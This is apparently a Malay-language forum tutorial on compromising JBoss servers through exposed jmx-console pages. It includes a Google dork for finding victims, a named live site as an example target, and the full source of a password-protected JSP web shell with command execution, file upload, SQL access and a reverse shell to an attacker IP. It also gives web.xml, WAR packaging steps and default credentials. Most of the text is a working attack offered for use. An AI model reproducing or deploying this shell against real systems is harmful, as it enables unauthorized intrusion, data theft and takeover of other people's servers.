Jboss exploitation

Credit

Izham87

Ini simple tutorial utk exploit jboss server yg mempunyai jmx-console directory yg boleh diaccess oleh public..cthnye mcm site nih -->http://epostrx.net/jmx-console/ ...site2 lain boleh dicari melalui google dgn carian

Code:

inurl:"jmx-console/HtmlAdaptor"

Requirement:

1.Ubuntu 10.10 ;D
2. Java Development Kit (JDK) dari Sun .Step utk install dlm ubuntu --> http://playingwithsid.blogspot.com/2010/...-1010.html
3. shell dlm jsp. perlukan shell.jsp ,folder WEB-INF dan web.xml .fail web.xml letak dlm folder WEB-INF.





Isi kandungan shell.jsp

Code:

<%@page contentType="text/html"%>
<%@page language="java" %>
<%@page import="java.util.*,java.io.*,java.sql.*,java.security.*,java.net.*,java.lang.*"%>
<%
/*

TODO: add connectors for more databases
*/
// authentication from kidz
String checkUser = "tbd";
String checkPass = "4f78625cd2d2251472af996a2ba1f7cc";
// MySql database port
String dbPort = "3306";                    // port (usually 3306)
// Dont touch the rest!
%>
<html><body>
<%
String myUser = request.getParameter("myUser");
String myPass = request.getParameter("myPass");
String dbH = request.getParameter("dbHost");
String dbN = request.getParameter("dbName");
String dbU = request.getParameter("dbUser");
String dbP = request.getParameter("dbPass");
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
String contentType = request.getContentType();
Connection conn = null;
Statement statement = null;
ResultSet rs = null;

%>
<%!
// form factory to make all my forms
public String formFactory(int formType, String myMessage){
    String form = null;
    if (formType == 1){
        form = "<p>"+myMessage+"</p>" +
        "<form method=\"POST\" action=\"\">" +
        "<textarea rows=\"5\" cols=\"55\" wrap=\"off\" name=\"qry\">" +
        "Enter SQL here" +
        "</textarea>" +
        "<p><input type=\"submit\" value=\"Execute SQL\"></p>" +
        "</form><hr>";
    }
    else if (formType == 2){
        form = "<h2>Access prohibited!! <span style=\"font-size: small;\">" +
        "if you dont know the pass GTFO</span></h2>"+myMessage+"<br>" +
        "<form method=\"POST\" action=\"\">" +
        "<table>" +
        "<tr><td><b>Username: </b></td>" +
        "<td><input type=\"text\" name=\"myUser\" size=\"10\"></td></tr>" +
        "<tr><td><b>Password: </b></td>" +
        "<td><input type=\"password\" name=\"myPass\" size=\"20\"></td></tr>" +
        "</table>"+
        "<p><input type=\"submit\" value=\"Submit\"></p>" +
        "</form>";
    }
    else if (formType == 3){
        form = "<p>"+myMessage+"</p>" +
        "<form method=\"POST\" action=\"\">" +
        "<table>" +
        "<tr><td><b>Database name: </b></td>" +
        "<td><input type=\"text\" name=\"dbName\" size=\"20\"></td></tr>" +
        "<tr><td><b>Database host: </b></td>" +
        "<td><input type=\"text\" name=\"dbHost\" size=\"20\"></td></tr>" +
        "<tr><td><b>Database user: </b></td>" +
        "<td><input type=\"text\" name=\"dbUser\" size=\"20\"></td></tr>" +
        "<tr><td><b>Database pass: </b></td>" +
        "<td><input type=\"password\" name=\"dbPass\" size=\"20\"></td></tr>" +
        "</table>"+
        "<p><input type=\"submit\" value=\"Submit\"></p>" +
        "</form><hr>";
    }
    else if (formType == 4){
        form = "<h2>Seekor kambing janggutnya lebat. <span style=\"font-size: small;\">" +
        "lol</span></h2>"+myMessage+"" +
        "<form method=\"POST\" action=\"\">" +
        "<table>" +
        "<tr><td><b>cmd: </b></td>" +
        "<td><input type=\"text\" name=\"cmd\"" +
        "value=\"Enter cmd here\"size=\"40\"></td></tr>" +
        "</table>"+
        "<p><input type=\"submit\" value=\"Submit\">" +
        "<input type=\"submit\" name=\"ciao\" value=\"logout\"></p>" +
        "</form>";
    }
    else if (formType == 5){
        form = "<form method=\"post\" ACTION=\"\" name=\"upform\""+    
        "ENCTYPE='multipart/form-data'>" +
        "<input type=\"file\" name=\"uploadfile\">" +
        "<input type=\"submit\" name=\"Submit\" value=\"Submit\">" +
        "<input type=\"reset\" name=\"Reset\" value=\"Reset\">" +
        "<input type=\"hidden\" name=\"action\" value=\"upload\">" +
        "</form>";
    }
    else if (formType == 6){
        form = "<form method=\"POST\"><b>IP Address: </b>" +
        "<input type=\"text\" name=\"ipaddress\" size=15><b> Port: </b>" +
        "<input type=\"text\" name=\"port\" size=5>" +
        "<input type=\"submit\" name=\"Connect\" value=\"Connect back\">" +
        "</form>";
    }
    return form;
}
// md5 routine from Jonathan Snook (snook.ca)
public String getMd5(String plainText){
    try{
        MessageDigest mdAlgorithm = MessageDigest.getInstance("MD5");
        mdAlgorithm.update(plainText.getBytes());
        byte[] digest = mdAlgorithm.digest();
        StringBuffer hexString = new StringBuffer();
        for (int i = 0; i < digest.length; i++) {
                plainText = Integer.toHexString(0xFF & digest[i]);
            if (plainText.length() < 2) {
                    plainText = "0" + plainText;
                }
                hexString.append(plainText);
        }
        return (hexString.toString());
    }
    catch(NoSuchAlgorithmException e) { return(null); }
}

// reverse shell class from Tan Chew Keong (http://www.security.org.sg/code/jspreverse.html)
static class StreamConnector extends Thread
{
        InputStream is;
        OutputStream os;
        StreamConnector(InputStream is, OutputStream os)
        {
                this.is = is;
                this.os = os;
        }
        public void run()
        {
                BufferedReader isr = null;
                BufferedWriter osw = null;
                try
                {
                        isr = new BufferedReader(new InputStreamReader(is));
                        osw = new BufferedWriter(new OutputStreamWriter(os));
                        char buffer[] = new char[8192];
                        int lenRead;
                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
                        {
                                osw.write(buffer, 0, lenRead);
                                osw.flush();
                        }
                }
                catch (Exception ioe){}
                try
                {
                        if(isr != null) isr.close();
                        if(osw != null) osw.close();
                }
                catch (Exception ioe){}
        }
}

%>
<pre>
<%
String checkSes = (String)session.getAttribute("admin");
String dbSet = (String)session.getAttribute("dbSet");
if (checkUser.equals(myUser) && checkPass.equals(getMd5(myPass)) || checkSes == "yes"){
    // we are god mode
    session.setAttribute("admin","yes");
    if (request.getParameter("qry") != null) {
        out.println(formFactory(4, ""));
        out.println(formFactory(6, ""));
        out.println(formFactory(5, ""));
        String sqlForm = formFactory(1, "<br><i>Enter your SQL syntax</i>");
        String ModdedSqlForm = sqlForm.replace("Enter SQL here",request.getParameter("qry"));
        out.println(ModdedSqlForm);
        // who needs connection pools ;)
        Class.forName("com.mysql.jdbc.Driver").newInstance();
        String dbUser = (String)session.getAttribute("dbUser");
        String dbPass = (String)session.getAttribute("dbPass");
        String dbHost = (String)session.getAttribute("dbHost");
        String dbName = (String)session.getAttribute("dbName");
        String connectionURL = "jdbc:mysql://"+dbHost+":"+dbPort+"/"+dbName+"?";
        // Connect to MySql with our correct details
        try{
            conn = DriverManager.getConnection(connectionURL,dbUser,dbPass);
            statement = conn.createStatement();
            rs = statement.executeQuery(request.getParameter("qry"));
            ResultSetMetaData rsMetaData = rs.getMetaData();
            int numberOfColumns = rsMetaData.getColumnCount();
            // while there are rows in the result set
            while (rs.next()) {
            out.println("<p>");
                // for every column in every row
                for (int i = 1; i < numberOfColumns + 1; i++) {
                          String columnName = rsMetaData.getColumnName(i);
                          out.println("<b>"+columnName + "</b> : " + rs.getString(i));
                    }
            }
            out.println("</p>");
            rs.close();
            // safely close our sql connection
            if (conn != null) {
                try {
                    conn.close();
                } catch (SQLException sqle) {
                    sqle.printStackTrace();
                }
            }
        }
        catch(SQLException sqle){
            return;
        }
    }
    else if (request.getParameter("cmd") != null
            && request.getParameter("ciao") == null){
        String cmdShell = formFactory(4, "");
        String ModdedCmdShell = cmdShell.replace("Enter cmd here",request.getParameter("cmd"));
        out.println(ModdedCmdShell);
        out.println(formFactory(6, ""));
        out.println(formFactory(5, ""));
        if (dbU != null && dbP != null || dbSet == "yes"){
            session.setAttribute("dbSet","yes");
            session.setAttribute("dbHost",dbH);
            session.setAttribute("dbPass",dbP);
            session.setAttribute("dbName",dbN);
            session.setAttribute("dbUser",dbU);
            out.println(formFactory(1, "<br><i>Enter your SQL syntax:</i>"));
        }else{
            out.println(formFactory(3, "<br><i>Enter MySql details:</i>"));
        }
        // cmd shell from redteam-pentesting.de
        String cmd = request.getParameter("cmd");
        try{
            Process p = Runtime.getRuntime().exec(cmd);
            OutputStream os = p.getOutputStream();
            InputStream in = p.getInputStream();
            DataInputStream dis = new DataInputStream(in);
            String disr = dis.readLine();
            while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
            }   
        }
        catch (IOException e){
            return;
        }       
    }
    // uploading our files
    else if ((contentType != null) && (contentType.indexOf("multipart/form-data") >= 0)) {
        DataInputStream in = new DataInputStream(request.getInputStream());
        int formDataLength = request.getContentLength();
        byte dataBytes[] = new byte[formDataLength];
        int byteRead = 0;
        int totalBytesRead = 0;
        while (totalBytesRead < formDataLength) {
            byteRead = in.read(dataBytes, totalBytesRead, formDataLength);
            totalBytesRead += byteRead;
        }
        String file = new String(dataBytes);
        String saveFile = file.substring(file.indexOf("filename=\"") + 10);
        saveFile = saveFile.substring(0, saveFile.indexOf("\n"));
        saveFile = saveFile.substring(saveFile.lastIndexOf("\\") +     1,saveFile.indexOf("\""));
        int lastIndex = contentType.lastIndexOf("=");
        String boundary = contentType.substring(lastIndex + 1,contentType.length());
        int pos = file.indexOf("filename=\"");
        pos = file.indexOf("\n", pos) + 1;
        pos = file.indexOf("\n", pos) + 1;
        pos = file.indexOf("\n", pos) + 1;   
        int boundaryLocation = file.indexOf(boundary, pos) - 4;
        int startPos = ((file.substring(0, pos)).getBytes()).length;
        int endPos = ((file.substring(0, boundaryLocation)).getBytes()).length;
        FileOutputStream fileOut = new FileOutputStream(saveFile);
        fileOut.write(dataBytes, startPos, (endPos - startPos));
        fileOut.flush();
        fileOut.close();
        response.setHeader("Refresh", "0");
    }

    // reverse shell
    else if(ipAddress != null && ipPort != null){
        Socket sock = null;
            try{
                    sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
                    Runtime rt = Runtime.getRuntime();
            Process proc = rt.exec("/bin/sh");
                    StreamConnector outputConnector =
                            new StreamConnector(proc.getInputStream(),
                                    sock.getOutputStream());
                    StreamConnector inputConnector =
                            new StreamConnector(sock.getInputStream(),
                                   proc.getOutputStream());
                    outputConnector.start();
                    inputConnector.start();
            }
            catch(Exception e) {}
        response.setHeader("Refresh", "0");
    }

    // logout
    else if (request.getParameter("ciao") != null){
        session.invalidate();
        response.setHeader("Refresh", "0");
    }
    else{
        out.println(formFactory(4, ""));
        out.println(formFactory(6, ""));
        out.println(formFactory(5, ""));
        // check too see if database credz have been set
        if (dbU != null && dbP != null || dbSet == "yes"){
            session.setAttribute("dbHost",dbH);
            session.setAttribute("dbPass",dbP);
            session.setAttribute("dbName",dbN);
            session.setAttribute("dbUser",dbU);
            // test the credentials
            try{
                String connectionURL = "jdbc:mysql://"+dbH+":"+dbPort+"/"+dbN+"?";
                conn = DriverManager.getConnection(connectionURL,dbU,dbP);
                session.setAttribute("dbSet","yes");
                //out.print("session set, doh!");
            }
            catch(SQLException sqle){
                out.println(formFactory(3, "<br><b>" +
                    "Credentials failed! </b><i>Enter MySql details:</i>"));
                return;
            }
            conn.close();
            out.println(formFactory(1, "<br><i>Enter your SQL syntax:</i>"));
        }else{
            out.println(formFactory(3, "<br><i>Enter MySql details:</i>"));
        }
    }
}
// if the username and password is incorrect
else if (myUser != null || myPass != null){
    session.setAttribute("admin","no");
    out.println(formFactory(2, "<br><b>username or password incorrect!</b>"));
}
// we just loaded the page for the first time
else{
    session.setAttribute("admin","no");
    out.println(formFactory(2, ""));
}
%>
</pre>
</body></html>

Credit goes to mr_me for the shell 

utk file shell.jsp nih ade beberapa configuration boleh ubah iaitu line :
Pertama:

Code:

Process proc = rt.exec("/bin/sh");

line diatas ubah ikut site ape yg korang exploit.kalau site tu operating system dia linux based kita guna rt.exec("/bin/sh"); kalau windows guna rt.exec("cmd.exe");

Nk tahu site tu guna OS ape tgk kat http://sitetu.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Atype%3DServerInfo

Kedua:

Code:

String checkUser = "tbd";
String checkPass = "4f78625cd2d2251472af996a2ba1f7cc";

shell nih ade password.Secara default username/pass == tbd/kambing. pass dlm bentuk md5 hash.

Isi kandungan web.xml:

Code:

<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/shell.jsp</jsp-file>
</servlet>
</web-app>

file web.xml akan diletakkan dlm folder WEB-INF.

4. tempat utk hostkan file war korang..file shell.jsp ,WEB-INF folder dan web.xml akan dipack jadi satu file war. ak guna project hosting kat code.google.com jek utk host file war ak..

cara nk create war file dan exploit jboss vuln boleh tgk video..

File video:

Code:

http://www.mediafire.com/?zyjvfwdtxch77yu

Thats all..Enjoy! 

Notes:
Cara yg ditunjukkan dlm video adalah cara plg mudah dan dlm situasi yg plg ideal..ade server yg x boleh guna cara nih sbb server terletak di belakang firewall yg x benarkan http request outbound connection dibuat. utk lebih mendalami Jboss exploitation boleh refer paper2 berikut:

1. http://www.redteam-pentesting.de/publica...ing_EN.pdf
2. http://www.nruns.com/_downloads/Whitepap...rowser.pdf
3. http://www.redteam-pentesting.de/publica...-MBean.pdf
4. https://www.trustwave.com/downloads/spid...nasiou.pdf